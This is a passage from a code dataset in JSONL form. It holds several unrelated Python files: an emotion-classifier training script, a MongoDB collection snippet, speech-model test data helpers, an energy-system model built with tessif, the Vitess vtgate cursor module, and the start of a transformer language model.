patience=int(patience/4), verbose=1)\n tensor_board = TensorBoard(log_dir='../log_dir',\n histogram_freq=1,\n write_graph=True,\n write_images=True)\n# plotter = AccLossPlotter(graphs=['acc', 'loss'], save_graph=True)\n callbacks = [model_checkpoint, csv_logger, early_stop, reduce_lr, tensor_board]\n\n # loading train dataset\n train_data_loader = DataManager(dataset_mode='train', image_size=input_shape[:2])\n train_faces, train_emotions = train_data_loader.load_fer2013()\n train_faces = preprocess_input(train_faces)\n num_samples, num_classes = train_emotions.shape\n\n # loading val dataset, PublicData\n val_data_loader = DataManager(dataset_mode='val', image_size=input_shape[:2])\n val_faces, val_emotions = val_data_loader.load_fer2013()\n val_faces = preprocess_input(val_faces)\n num_samples, num_classes = val_emotions.shape \n\n \n # Efficiency: generator run by paralle\n # Trains the model on data generated batch-by-batch by a Python generator\n model.fit_generator(data_generator.flow(train_faces, train_emotions,\n batch_size),\n steps_per_epoch=len(train_faces) / batch_size,\n shuffle=True,\n epochs=num_epochs, verbose=1, callbacks=callbacks,\n validation_data=(val_faces, val_emotions))\n\n","sub_path":"src/train_emotion_classifier.py","file_name":"train_emotion_classifier.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"183622010","text":"# coding:utf-8\r\n# 创建db必须只是创建一个collection\r\nimport pymongo\r\n\r\ndb_name = 'dbname'\r\ncol_name = 'collectionname'\r\n\r\n# 连接数据库服务器\r\nclient = pymongo.MongoClient('localhost', 27017)\r\n\r\n\r\ndb = client[db_name]\r\nc = db.create_collection(col_name)\r\n\r\n# 关闭连接\r\nclient.close()","sub_path":"messy/python_basic/持久化存储/数据库/database/mongo_util/create_collection.py","file_name":"create_collection.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565839635","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport numpy as np\n\nfrom utils.io.inputs.splicing import do_splice\nfrom utils.io.inputs.frame_stacking import stack_frame\nfrom utils.io.inputs.feature_extraction import wav2feature\n\nSPACE = '_'\nEOS = '>'\n\n\ndef _read_text(trans_path):\n \"\"\"Read char-level transcripts.\n Args:\n trans_path (string): path to a transcript text file\n Returns:\n transcript (string): a text of transcript\n \"\"\"\n # Read ground truth labels\n with open(trans_path, 'r') as f:\n line = f.readlines()[-1]\n transcript = ' '.join(line.strip().lower().split(' ')[2:])\n return transcript\n\n\ndef generate_data(label_type='char', batch_size=1,\n num_stack=1, splice=1, backend='pytorch'):\n \"\"\"Generate dataset for unit test.\n Args:\n label_type (string, optional): char or word or word_char\n batch_size (int): the size of mini-batch\n splice (int): frames to splice. Default is 1 frame.\n backend (string, optional): pytorch or chainer\n Returns:\n xs (np.ndarray): A tensor of size `[B, T, input_size]`\n ys (np.ndarray): `[B, max_label_seq_len]`\n x_lens (np.ndarray): A tensor of size `[B]`\n y_lens (np.ndarray): A tensor of size `[B]`\n \"\"\"\n # Make input data\n _xs, x_lens = wav2feature(\n ['../../sample/LDC93S1.wav'] * batch_size,\n feature_type='logfbank', feature_dim=40,\n energy=False, delta1=True, delta2=True, dtype=np.float32)\n\n max_frame_num = math.ceil(x_lens[0] / num_stack)\n if backend == 'pytorch':\n xs = np.zeros((batch_size, max_frame_num, _xs.shape[-1] * num_stack * splice),\n dtype=np.float32)\n elif backend == 'chainer':\n xs = [None] * batch_size\n\n for i, b in enumerate(range(batch_size)):\n # Frame stacking\n data_i = stack_frame(_xs[b], num_stack=num_stack, num_skip=num_stack,\n dtype=np.float32)\n\n # Splice\n data_i = do_splice(data_i, splice=splice, num_stack=num_stack,\n dtype=np.float32)\n\n xs[b, :len(data_i) - i] = data_i[:len(data_i) - i]\n x_lens[b] = len(data_i) - i\n\n # Make transcripts\n trans = _read_text('../../sample/LDC93S1.txt')\n trans = trans.replace('.', '').replace(' ', SPACE)\n if label_type == 'char':\n ys = np.array([char2idx(trans)] * batch_size, dtype=np.int32)\n y_lens = np.array([len(char2idx(trans))] * batch_size, dtype=np.int32)\n return xs, ys, x_lens, y_lens\n\n elif label_type == 'word':\n ys = np.array([word2idx(trans)] * batch_size, dtype=np.int32)\n y_lens = np.array([len(word2idx(trans))] * batch_size, dtype=np.int32)\n return xs, ys, x_lens, y_lens\n\n elif label_type == 'word_char':\n ys = np.array([word2idx(trans)] * batch_size, dtype=np.int32)\n ys_sub = np.array([char2idx(trans)] * batch_size, dtype=np.int32)\n y_lens = np.array([len(word2idx(trans))] * batch_size, dtype=np.int32)\n y_lens_sub = np.array(\n [len(char2idx(trans))] * batch_size, dtype=np.int32)\n return xs, ys, ys_sub, x_lens, y_lens, y_lens_sub\n\n else:\n raise NotImplementedError\n\n\ndef char2idx(transcript):\n \"\"\"Convert from character to index.\n Args:\n transcript (string): a sequence of string\n Returns:\n index_list (list): indices of characters\n \"\"\"\n char_list = list(transcript)\n\n first_idx = ord('a') - 1\n last_idx = ord('z') - first_idx\n # NOTE: 0 is reserved for space\n\n index_list = []\n for char in char_list:\n if char == SPACE:\n index_list.append(0)\n elif char == EOS:\n index_list.append(last_idx + 1)\n else:\n index_list.append(ord(char) - first_idx)\n return index_list\n\n\ndef idx2char(indices):\n \"\"\"Convert from index to character.\n Args:\n indices (Variable): Variable of indices\n blank_index (int, optional): the index of the blank class\n Returns:\n transcript (string): a sequence of string\n \"\"\"\n if isinstance(indices, np.ndarray):\n indices = indices.tolist()\n\n first_idx = ord('a') - 1\n last_idx = ord('z') - first_idx\n # NOTE: 0 is reserved for space\n\n char_list = []\n for idx in indices:\n if idx == 0:\n char_list.append(SPACE)\n elif idx == last_idx + 1:\n char_list.append(EOS)\n else:\n char_list.append(chr(idx + first_idx))\n transcript = ''.join(char_list)\n return transcript\n\n\ndef word2idx(transcript):\n \"\"\"Convert from word to index.\n Args:\n transcript (string): a sequence of space-separated string\n Returns:\n index_list (list): indices of words\n \"\"\"\n word_list = transcript.split(SPACE)\n\n # Register word dict\n vocab = set([])\n for word in word_list:\n if word in [EOS]:\n continue\n vocab.add(word)\n\n word_dict = {}\n with open('../../word.txt', 'w') as f:\n for idx, word in enumerate(sorted(list(vocab))):\n word_dict[word] = idx\n f.write('%s\\n' % word)\n word_dict[EOS] = len(vocab)\n f.write('%s\\n' % EOS)\n\n index_list = []\n for word in word_list:\n index_list.append(word_dict[word])\n return index_list\n\n\ndef idx2word(indices):\n \"\"\"Convert from index to word.\n Args:\n indices (Variable): Variable of indices\n blank_index (int, optional): the index of the blank class\n Returns:\n transcript (string): a sequence of string\n \"\"\"\n if isinstance(indices, np.ndarray):\n indices = indices.tolist()\n\n word_dict = {}\n with open('../../word.txt', 'r') as f:\n for idx, line in enumerate(f):\n word = line.strip()\n word_dict[idx] = word\n\n word_list = []\n for idx in indices:\n word_list.append(word_dict[idx])\n transcript = SPACE.join(word_list)\n return transcript\n","sub_path":"models/test/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191623522","text":"import os\n\nimport numpy as np\nimport pandas as pd\n\nimport tessif.frused.namedtuples as nts\nfrom tessif.frused.paths import example_dir\nfrom tessif.model import components, energy_system\n\n\ndef create_losslc_es(periods=24,):\n \"\"\"\n Create the TransCnE system model scenarios combinations.\n\n Parameters\n ----------\n periods : int, default=24\n Number of time steps of the evaluated timeframe (one time step is one\n hour)\n\n Note\n ----\n Changes compared to `Hanke Project Thesis\n `_:\n\n 1. Rename ``\"[High/Mid/Low] Voltage Powerline\"`` to ``\"[High/Mid/Low]\n Voltage Grid\"``\n 2. Rename ``\"[High/Low] Voltage Transformator\"`` to ``\"[High/Low]\n Voltage Transfer Grid\"``\n\n Return\n ------\n es: :class:`tessif.model.energy_system.AbstractEnergySystem`\n Tessif energy system.\n \"\"\"\n # 2. Create a simulation time frame as a :class:`pandas.DatetimeIndex`:\n timeframe = pd.date_range('10/13/2030', periods=periods, freq='H')\n\n # 3. Parse csv files with the demand and renewables load data:\n d = os.path.join(example_dir, 'data', 'tsf', 'load_profiles')\n\n # solar:\n pv = pd.read_csv(os.path.join(d, 'Renewable_Energy.csv'),\n index_col=0, sep=';')\n pv = pv['pv_load'].values.flatten()[0:periods]\n max_pv = np.max(pv)\n\n # wind onshore:\n w_on = pd.read_csv(os.path.join(\n d, 'Renewable_Energy.csv'), index_col=0, sep=';')\n w_on = w_on['won_load'].values.flatten()[0:periods]\n max_w_on = np.max(w_on)\n\n # wind offshore:\n w_off = pd.read_csv(os.path.join(\n d, 'Renewable_Energy.csv'), index_col=0, sep=';')\n w_off = w_off['woff_load'].values.flatten()[0:periods]\n max_w_off = np.max(w_off)\n\n # solar thermal:\n s_t = pd.read_csv(os.path.join(\n d, 'Renewable_Energy.csv'), index_col=0, sep=';')\n s_t = s_t['st_load'].values.flatten()[0:periods]\n max_s_t = np.max(s_t)\n\n # household demand\n h_d = pd.read_csv(os.path.join(d, 'Loads.csv'), index_col=0, sep=';')\n h_d = h_d['household_demand'].values.flatten()[0:periods]\n max_h_d = np.max(h_d)\n\n # industrial demand\n i_d = pd.read_csv(os.path.join(d, 'Loads.csv'), index_col=0, sep=';')\n i_d = i_d['industrial_demand'].values.flatten()[0:periods]\n max_i_d = np.max(i_d)\n\n # commercial demand\n c_d = pd.read_csv(os.path.join(d, 'Loads.csv'), index_col=0, sep=';')\n c_d = c_d['commercial_demand'].values.flatten()[0:periods]\n max_c_d = np.max(c_d)\n\n # district heating demand\n dh_d = pd.read_csv(os.path.join(d, 'Loads.csv'), index_col=0, sep=';')\n dh_d = dh_d['heat_demand'].values.flatten()[0:periods]\n max_dh_d = np.max(dh_d)\n\n # car charging demand\n cc_d = pd.read_csv(os.path.join(d, 'Car_Charging.csv'),\n index_col=0, sep=';')\n cc_d = cc_d['cc_demand'].values.flatten()[0:periods]\n max_cc_d = np.max(cc_d)\n\n # 4. Create the individual energy system components:\n global_constraints = {\n 'name': 'default',\n 'emissions': float('+inf'),\n }\n\n # -------------Low Voltage and heat ------------------\n\n solar_panel = components.Source(\n name='Solar Panel',\n outputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='Electricity',\n node_type='Renewable',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_pv)},\n flow_costs={'electricity': 60.85},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=pv, max=pv)},\n\n )\n\n biogas_supply = components.Source(\n name='Biogas plant',\n outputs=('fuel',),\n # Minimum number of arguments required\n sector='Coupled',\n carrier='Gas',\n node_type='source',\n flow_rates={'fuel': nts.MinMax(min=0, max=25987.87879)},\n flow_costs={'fuel': 0},\n flow_emissions={'fuel': 0},\n )\n\n bhkw_generator = components.Transformer(\n name='BHKW',\n inputs=('fuel',),\n outputs=('electricity', 'heat'),\n conversions={('fuel', 'electricity'): 0.33, ('fuel', 'heat'): 0.52},\n # Minimum number of arguments required\n sector='Coupled',\n carrier='electricity',\n node_type='transformer',\n flow_rates={\n 'fuel': nts.MinMax(min=0, max=25987.87879),\n 'electricity': nts.MinMax(min=0, max=8576),\n 'heat': nts.MinMax(min=0, max=13513.69697)},\n flow_costs={'fuel': 0, 'electricity': 124.4, 'heat': 31.1},\n flow_emissions={'fuel': 0, 'electricity': 0.1573, 'heat': 0.0732},\n )\n\n household_demand = components.Sink(\n name='Household Demand',\n inputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='demand',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_h_d)},\n flow_costs={'electricity': 0},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=h_d, max=h_d)},\n )\n\n commercial_demand = components.Sink(\n name='Commercial Demand',\n inputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='demand',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_c_d)},\n flow_costs={'electricity': 0},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=c_d, max=c_d)},\n )\n\n heat_demand = components.Sink(\n name='District Heating Demand',\n inputs=('heat',),\n # Minimum number of arguments required\n sector='Heat',\n carrier='hot Water',\n node_type='demand',\n flow_rates={'heat': nts.MinMax(min=0, max=max_dh_d)},\n flow_costs={'heat': 0},\n flow_emissions={'heat': 0},\n timeseries={'heat': nts.MinMax(min=dh_d, max=dh_d)},\n )\n\n gas_supply_line = components.Bus(\n name='Gaspipeline',\n inputs=('Gas Station.fuel',),\n outputs=('GuD.fuel',),\n # Minimum number of arguments required\n sector='Power',\n carrier='gas',\n node_type='bus',\n )\n\n biogas_supply_line = components.Bus(\n name='Biogas',\n inputs=('Biogas plant.fuel',),\n outputs=('BHKW.fuel',),\n # Minimum number of arguments required\n sector='Coupled',\n carrier='gas',\n node_type='bus',\n )\n\n low_electricity_line = components.Bus(\n name='Low Voltage Powerline',\n inputs=(\n 'BHKW.electricity',\n 'Battery.electricity',\n 'Solar Panel.electricity',\n ),\n outputs=(\n 'Household Demand.electricity',\n 'Commercial Demand.electricity',\n 'Battery.electricity',\n ),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='bus',\n )\n\n heat_line = components.Bus(\n name='District Heating',\n inputs=(\n 'BHKW.heat',\n 'Solar Thermal.heat',\n 'Heat Storage.heat',\n 'Power to Heat.heat',\n 'HKW.heat',\n ),\n outputs=(\n 'District Heating Demand.heat',\n 'Heat Storage.heat',\n ),\n # Minimum number of arguments required\n sector='Heat',\n carrier='hot Water',\n node_type='bus',\n )\n\n # ----- -------Medium Voltage and Heat ------------------\n\n onshore_wind_power = components.Source(\n name='Onshore Wind Power',\n outputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='Electricity',\n node_type='Renewable',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_w_on)},\n flow_costs={'electricity': 61.1},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=w_on, max=w_on)},\n )\n\n solar_thermal = components.Source(\n name='Solar Thermal',\n outputs=('heat',),\n # Minimum number of arguments required\n sector='Heat',\n carrier='Hot Water',\n node_type='Renewable',\n flow_rates={'heat': nts.MinMax(min=0, max=max_s_t)},\n flow_costs={'heat': 73},\n flow_emissions={'heat': 0},\n timeseries={'heat': nts.MinMax(min=s_t, max=s_t)},\n )\n\n industrial_demand = components.Sink(\n name='Industrial Demand',\n inputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='demand',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_i_d)},\n flow_costs={'electricity': 0},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=i_d, max=i_d)},\n )\n\n car_charging_station_demand = components.Sink(\n name='Car charging Station',\n inputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='demand',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_cc_d)},\n flow_costs={'electricity': 0},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=cc_d, max=cc_d)},\n )\n\n power_to_heat = components.Transformer(\n name='Power to Heat',\n inputs=('electricity',),\n outputs=('heat',),\n conversions={('electricity', 'heat'): 1.00},\n # Minimum number of arguments required\n carrier='Hot Water',\n node_type='transformer',\n flow_rates={\n 'electricity': nts.MinMax(min=0, max=50000),\n 'heat': nts.MinMax(min=0, max=50000),\n },\n flow_costs={'electricity': 0, 'heat': 0},\n flow_emissions={'electricity': 0, 'heat': 0},\n )\n\n medium_electricity_line = components.Bus(\n name='Medium Voltage Grid',\n inputs=('Onshore Wind Power.electricity',),\n outputs=(\n 'Car charging Station.electricity',\n 'Industrial Demand.electricity',\n 'Power to Heat.electricity',\n ),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='bus',\n )\n\n low_medium_transformator = components.Connector(\n name='Low Voltage Transfer Grid',\n interfaces=(\n 'Medium Voltage Grid',\n 'Low Voltage Powerline'),\n conversions={\n ('Medium Voltage Grid', 'Low Voltage Powerline'): 1,\n ('Low Voltage Powerline', 'Medium Voltage Grid'): 1,\n },\n node_type='connector',\n )\n\n # ----------------- High Voltage -------------------------\n\n offshore_wind_power = components.Source(\n name='Offshore Wind Power',\n outputs=('electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='Electricity',\n node_type='Renewable',\n flow_rates={'electricity': nts.MinMax(min=0, max=max_w_off)},\n flow_costs={'electricity': 106.4},\n flow_emissions={'electricity': 0},\n timeseries={'electricity': nts.MinMax(min=w_off, max=w_off)},\n )\n\n coal_supply = components.Source(\n name='Coal Supply',\n outputs=('fuel',),\n # Minimum number of arguments required\n sector='Coupled',\n carrier='Coal',\n node_type='source',\n flow_rates={'fuel': nts.MinMax(min=0, max=102123.3)},\n flow_costs={'fuel': 0},\n flow_emissions={'fuel': 0},\n )\n\n gas_supply = components.Source(\n name='Gas Station',\n outputs=('fuel',),\n # Minimum number of arguments required\n sector='Power',\n carrier='Gas',\n node_type='source',\n flow_rates={'fuel': nts.MinMax(min=0, max=float('+inf'))},\n flow_costs={'fuel': 0},\n flow_emissions={'fuel': 0},\n )\n\n hkw_generator = components.Transformer(\n name='HKW',\n inputs=('fuel',),\n outputs=('electricity', 'heat'),\n conversions={('fuel', 'electricity'): 0.24, ('fuel', 'heat'): 0.6},\n # Minimum number of arguments required\n sector='Coupled',\n carrier='electricity',\n node_type='transformer',\n flow_rates={\n 'fuel': nts.MinMax(min=0, max=102123.3),\n 'electricity': nts.MinMax(min=0, max=24509.6),\n 'heat': nts.MinMax(min=0, max=61273.96)},\n flow_costs={'fuel': 0, 'electricity': 80.65, 'heat': 20.1625},\n flow_emissions={'fuel': 0, 'electricity': 0.5136, 'heat': 0.293},\n )\n\n hkw_generator_2 = components.Transformer(\n name='HKW2',\n inputs=('fuel',),\n outputs=('electricity',),\n conversions={('fuel', 'electricity'): 0.43},\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='connector',\n flow_rates={\n 'fuel': nts.MinMax(min=0, max=102123.3),\n 'electricity': nts.MinMax(min=0, max=43913)},\n flow_costs={'fuel': 0, 'electricity': 80.65},\n flow_emissions={'fuel': 0, 'electricity': 0.5136},\n )\n\n gud_generator = components.Transformer(\n name='GuD',\n inputs=('fuel',),\n outputs=('electricity',),\n conversions={('fuel', 'electricity'): 0.59},\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='transformer',\n flow_rates={\n 'fuel': nts.MinMax(min=0, max=45325.42373),\n 'electricity': nts.MinMax(min=0, max=26742)},\n flow_costs={'fuel': 0, 'electricity': 88.7},\n flow_emissions={'fuel': 0, 'electricity': 0.3366},\n )\n\n coal_supply_line = components.Bus(\n name='Coal Supply Line',\n inputs=('Coal Supply.fuel',),\n outputs=('HKW.fuel', 'HKW2.fuel'),\n # Minimum number of arguments required\n sector='Coupled',\n carrier='Coal',\n node_type='bus',\n )\n\n high_electricity_line = components.Bus(\n name='High Voltage Grid',\n inputs=(\n 'Offshore Wind Power.electricity',\n 'GuD.electricity',\n 'HKW.electricity',\n 'HKW2.electricity',\n ),\n outputs=('Power Sink.electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='bus',\n )\n\n high_medium_transformator = components.Connector(\n name='High Voltage Transfer Grid',\n interfaces=(\n 'Medium Voltage Grid',\n 'High Voltage Grid',\n ),\n conversions={\n ('Medium Voltage Grid', 'High Voltage Grid'): 1,\n ('High Voltage Grid', 'Medium Voltage Grid'): 1,\n },\n node_type='connector',\n )\n\n # 4. Create the actual energy system:\n es = energy_system.AbstractEnergySystem(\n uid=\"LossLC\",\n busses=(\n gas_supply_line,\n low_electricity_line,\n heat_line,\n medium_electricity_line,\n high_electricity_line,\n coal_supply_line,\n biogas_supply_line,\n ),\n sinks=(\n household_demand,\n commercial_demand,\n heat_demand,\n industrial_demand,\n car_charging_station_demand,\n ),\n sources=(\n solar_panel,\n gas_supply,\n onshore_wind_power,\n offshore_wind_power,\n coal_supply,\n solar_thermal,\n biogas_supply,\n ),\n transformers=(\n bhkw_generator,\n power_to_heat,\n gud_generator,\n hkw_generator,\n hkw_generator_2,\n ),\n connectors=(\n low_medium_transformator,\n high_medium_transformator,\n ),\n timeframe=timeframe,\n global_constraints=global_constraints,\n )\n\n return es\n","sub_path":"docs/source/getting_started/examples/application/phd/field_study/LossLC/creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":16093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134011055","text":"# Copyright 2012, Google Inc. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can\n# be found in the LICENSE file.\n\nimport itertools\nimport re\n\nfrom vtdb import cursor\nfrom vtdb import dbexceptions\nfrom vtdb import keyrange_constants\n\n\nwrite_sql_pattern = re.compile('\\s*(insert|update|delete)', re.IGNORECASE)\n\n\nclass VTGateCursor(object):\n arraysize = 1\n lastrowid = None\n rowcount = 0\n results = None\n _conn = None\n description = None\n index = None\n keyspace = None\n tablet_type = None\n keyspace_ids = None\n keyranges = None\n _writable = None\n routing = None\n\n def __init__(self, connection, keyspace, tablet_type, keyspace_ids=None, keyranges=None, writable=False):\n self._conn = connection\n self.keyspace = keyspace\n self.tablet_type = tablet_type\n self.keyspace_ids = keyspace_ids\n self.keyranges = keyranges\n self._writable = writable\n\n def connection_list(self):\n return [self._conn]\n\n def close(self):\n self.results = None\n\n def is_writable(self):\n return self._writable\n\n def commit(self):\n return self._conn.commit()\n\n def begin(self):\n return self._conn.begin()\n\n def rollback(self):\n return self._conn.rollback()\n\n # pass kargs here in case higher level APIs need to push more data through\n # for instance, a key value for shard mapping\n def execute(self, sql, bind_variables, **kargs):\n self.rowcount = 0\n self.results = None\n self.description = None\n self.lastrowid = None\n\n sql_check = sql.strip().lower()\n if sql_check == 'begin':\n self.begin()\n return\n elif sql_check == 'commit':\n self.commit()\n return\n elif sql_check == 'rollback':\n self.rollback()\n return\n\n write_query = bool(write_sql_pattern.match(sql))\n # NOTE: This check may also be done at high-layers but adding it here for completion.\n if write_query:\n if not self.is_writable():\n raise dbexceptions.DatabaseError('DML on a non-writable cursor', sql)\n\n self.results, self.rowcount, self.lastrowid, self.description = self._conn._execute(\n sql,\n bind_variables,\n self.keyspace,\n self.tablet_type,\n keyspace_ids=self.keyspace_ids,\n keyranges=self.keyranges)\n self.index = 0\n return self.rowcount\n\n def execute_entity_ids(self, sql, bind_variables, entity_keyspace_id_map, entity_column_name):\n self.rowcount = 0\n self.results = None\n self.description = None\n self.lastrowid = None\n\n # This is by definition a scatter query, so raise exception.\n write_query = bool(write_sql_pattern.match(sql))\n if write_query:\n raise dbexceptions.DatabaseError('execute_entity_ids is not allowed for write queries')\n\n self.results, self.rowcount, self.lastrowid, self.description = self._conn._execute_entity_ids(\n sql,\n bind_variables,\n self.keyspace,\n self.tablet_type,\n entity_keyspace_id_map,\n entity_column_name)\n self.index = 0\n return self.rowcount\n\n\n def fetchone(self):\n if self.results is None:\n raise dbexceptions.ProgrammingError('fetch called before execute')\n\n if self.index >= len(self.results):\n return None\n self.index += 1\n return self.results[self.index-1]\n\n def fetchmany(self, size=None):\n if self.results is None:\n raise dbexceptions.ProgrammingError('fetch called before execute')\n\n if self.index >= len(self.results):\n return []\n if size is None:\n size = self.arraysize\n res = self.results[self.index:self.index+size]\n self.index += size\n return res\n\n def fetchall(self):\n if self.results is None:\n raise dbexceptions.ProgrammingError('fetch called before execute')\n return self.fetchmany(len(self.results)-self.index)\n\n def fetch_aggregate_function(self, func):\n return func(row[0] for row in self.fetchall())\n\n def fetch_aggregate(self, order_by_columns, limit):\n sort_columns = []\n desc_columns = []\n for order_clause in order_by_columns:\n if type(order_clause) in (tuple, list):\n sort_columns.append(order_clause[0])\n if ascii_lower(order_clause[1]) == 'desc':\n desc_columns.append(order_clause[0])\n else:\n sort_columns.append(order_clause)\n # sort the rows and then trim off the prepended sort columns\n\n if sort_columns:\n sorted_rows = list(sort_row_list_by_columns(self.fetchall(), sort_columns, desc_columns))[:limit]\n else:\n sorted_rows = itertools.islice(self.fetchall(), limit)\n neutered_rows = [row[len(order_by_columns):] for row in sorted_rows]\n return neutered_rows\n\n def callproc(self):\n raise dbexceptions.NotSupportedError\n\n def executemany(self, *pargs):\n raise dbexceptions.NotSupportedError\n\n def nextset(self):\n raise dbexceptions.NotSupportedError\n\n def setinputsizes(self, sizes):\n pass\n\n def setoutputsize(self, size, column=None):\n pass\n\n @property\n def rownumber(self):\n return self.index\n\n def __iter__(self):\n return self\n\n def next(self):\n val = self.fetchone()\n if val is None:\n raise StopIteration\n return val\n\n\nclass BatchVTGateCursor(VTGateCursor):\n def __init__(self, connection, keyspace, tablet_type, keyspace_ids=None,\n keyranges=None, writable=False):\n # rowset is [(results, rowcount, lastrowid, fields),]\n self.rowsets = None\n self.query_list = []\n self.bind_vars_list = []\n VTGateCursor.__init__(self, connection, keyspace, tablet_type,\n keyspace_ids=keyspace_ids, writable=writable)\n\n def execute(self, sql, bind_variables=None):\n self.query_list.append(sql)\n self.bind_vars_list.append(bind_variables)\n\n def flush(self):\n self.rowsets = self._conn._execute_batch(self.query_list,\n self.bind_vars_list,\n self.keyspace,\n self.tablet_type,\n self.keyspace_ids)\n self.query_list = []\n self.bind_vars_list = []\n\n\nclass StreamVTGateCursor(VTGateCursor):\n arraysize = 1\n conversions = None\n connection = None\n description = None\n index = None\n fetchmany_done = False\n\n def __init__(self, connection, keyspace, tablet_type, keyspace_ids=None, keyranges=None, writable=False):\n VTGateCursor.__init__(self, connection, keyspace, tablet_type, keyspace_ids=keyspace_ids, keyranges=keyranges)\n\n # pass kargs here in case higher level APIs need to push more data through\n # for instance, a key value for shard mapping\n def execute(self, sql, bind_variables, **kargs):\n if self._writable:\n raise dbexceptions.ProgrammingError('Streaming query cannot be writable')\n\n self.description = None\n x, y, z, self.description = self._conn._stream_execute(\n sql,\n bind_variables,\n self.keyspace,\n self.tablet_type,\n keyspace_ids=self.keyspace_ids,\n keyranges=self.keyranges)\n self.index = 0\n return 0\n\n def fetchone(self):\n if self.description is None:\n raise dbexceptions.ProgrammingError('fetch called before execute')\n\n self.index += 1\n return self._conn._stream_next()\n\n # fetchmany can be called until it returns no rows. Returning less rows\n # than what we asked for is also an indication we ran out, but the cursor\n # API in PEP249 is silent about that.\n def fetchmany(self, size=None):\n if size is None:\n size = self.arraysize\n result = []\n if self.fetchmany_done:\n self.fetchmany_done = False\n return result\n for i in xrange(size):\n row = self.fetchone()\n if row is None:\n self.fetchmany_done = True\n break\n result.append(row)\n return result\n\n def fetchall(self):\n result = []\n while True:\n row = self.fetchone()\n if row is None:\n break\n result.append(row)\n return result\n\n def callproc(self):\n raise dbexceptions.NotSupportedError\n\n def executemany(self, *pargs):\n raise dbexceptions.NotSupportedError\n\n def nextset(self):\n raise dbexceptions.NotSupportedError\n\n def setinputsizes(self, sizes):\n pass\n\n def setoutputsize(self, size, column=None):\n pass\n\n @property\n def rownumber(self):\n return self.index\n\n def __iter__(self):\n return self\n\n def next(self):\n val = self.fetchone()\n if val is None:\n raise StopIteration\n return val\n\n\n# assumes the leading columns are used for sorting\ndef sort_row_list_by_columns(row_list, sort_columns=(), desc_columns=()):\n for column_index, column_name in reversed([x for x in enumerate(sort_columns)]):\n og = operator.itemgetter(column_index)\n if type(row_list) != list:\n row_list = sorted(\n row_list, key=og, reverse=bool(column_name in desc_columns))\n else:\n row_list.sort(key=og, reverse=bool(column_name in desc_columns))\n return row_list\n","sub_path":"py/vtdb/vtgate_cursor.py","file_name":"vtgate_cursor.py","file_ext":"py","file_size_in_byte":8899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"89640762","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom otrans.data import PAD\nfrom otrans.metrics import LabelSmoothingLoss\nfrom otrans.layer import TransformerEncoderLayer\nfrom otrans.module import PositionalEncoding\n\n\ndef get_seq_mask(targets):\n batch_size, steps = targets.size()\n seq_mask = torch.ones([batch_size, steps, steps], device=targets.device)\n seq_mask = torch.tril(seq_mask).bool()\n return seq_mask\n\n\nclass TransformerLanguageModel(nn.Module):\n def __init__(self, params):\n super(TransformerLanguageModel, self).__init__()\n\n self.model_type = 'transformer_lm'\n self.normalize_before = False\n self.smoothing = params['smoothing']\n self.vocab_size = params['vocab_size']\n self.num_blocks = params['num_blocks']\n\n self.embedding = nn.Embedding(self.vocab_size, params['d_model'])\n self.pos_embedding = PositionalEncoding(params['d_model'], 0.0)\n\n self.blocks = nn.ModuleList([\n TransformerEncoderLayer(\n params['n_heads'], params['d_model'], params['ffn_units'],\n slf_attn_dropout_rate=0.0, ffn_dropout_rate=0.0,\n residual_dropout_rate=params['residual_dropout_rate'],\n normalize_before=False, concat_after=False, activation='glu') for _ in range(self.num_blocks)\n ])\n\n if self.normalize_before:\n self.after_norm = nn.LayerNorm(params['d_model'])\n\n self.output_project = nn.Linear(params['d_model'], self.vocab_size)\n\n if params['share_embedding']:\n self.output_project.weight = self.embedding.weight\n print('Share the weight of embedding to the output project layer!')\n\n self.crit = LabelSmoothingLoss(size=self.vocab_size, smoothing=self.smoothing, padding_idx=PAD)\n\n def forward(self, inputs, targets, pitchs=None):\n\n dec_mask = get_seq_mask(inputs)\n dec_output = self.embedding(inputs)\n dec_output = self.pos_embedding(dec_output)\n\n for _, block in enumerate(self.blocks):\n dec_output, dec_mask = block(dec_output, dec_mask)\n\n if 